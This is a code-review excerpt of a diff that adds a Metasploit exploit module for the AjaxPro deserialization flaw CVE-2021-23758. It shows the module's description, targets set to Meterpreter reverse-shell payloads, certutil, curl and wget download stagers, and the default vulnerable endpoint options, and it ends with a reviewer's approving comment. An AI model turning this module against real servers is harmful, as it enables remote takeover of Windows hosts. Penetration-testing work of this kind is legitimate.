modules/exploits/windows/http/ajaxpro_deserialization_rce.rb

```diff
@@ -0,0 +1,193 @@
+          payload.
+
+          All AjaxPro versions prior to 21.10.30.1 are vulnerable to this
+          issue, and a vulnerable method which can be used to trigger the
+          deserialization exists in the default AjaxPro namespace.
+
+          AjaxPro 21.10.30.1 removed the vulnerable method, but if a custom
+          method that accepts a parameter of type that is assignable from
+          `ObjectDataProvider` (e.g. `object`) exists, the vulnerability can
+          still be exploited.
+
+          This module has been tested successfully against official AjaxPro on
+          version 7.7.31.1 without any modification, and on version 21.10.30.1
+          with custom vulnerable method added.
+        },
+        'Author' => [
+          'Hans-Martin Münch (MOGWAI LABS)', # Discovery
+          'Jemmy Wang' # MSF Module
+        ],
+        'References' => [
+          ['CVE', '2021-23758'],
+          ['URL', 'https://mogwailabs.de/en/blog/2022/01/vulnerability-spotlight-rce-in-ajax.net-professional/']
+        ],
+        'DisclosureDate' => '2021-12-03',
+        'License' => MSF_LICENSE,
+        'Platform' => ['windows'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
+                'CMDSTAGER::FLAVOR' => 'certutil'
+              },
+              'CmdStagerFlavor' => %w[vbs certutil debug_write debug_asm tftp psh_invokewebrequest curl wget lwp-request],
+              'Notes' => {
+                'SideEffects' => [SCREEN_EFFECTS, IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => { 'WfsDelay' => 30 },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [SCREEN_EFFECTS, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to AjaxPro Handler', '/ajaxpro/']),
+      OptString.new('Namespace', [true, 'Namespace of vulnerable method', 'AjaxPro.Services.ICartService,AjaxPro.2']),
+      OptString.new('Method', [true, 'Name of vulnerable method', 'AddItem']),
+      OptString.new('Parameter', [true, 'Name of vulnerable parameter', 'item'])
+    ])
+
+    @ajax_pro = { ID: 'AjaxPro' }
+  end
+
+  def check
```

Comment:
Nice thorough check method. I like how you check `core.ashx` (which should always be present as it's packaged in the `AjaxPro.2.dll`) for the version info as well the vulnerable endpoint `target_uri.path, datastore['Namespace'] + '.ashx'` 👌.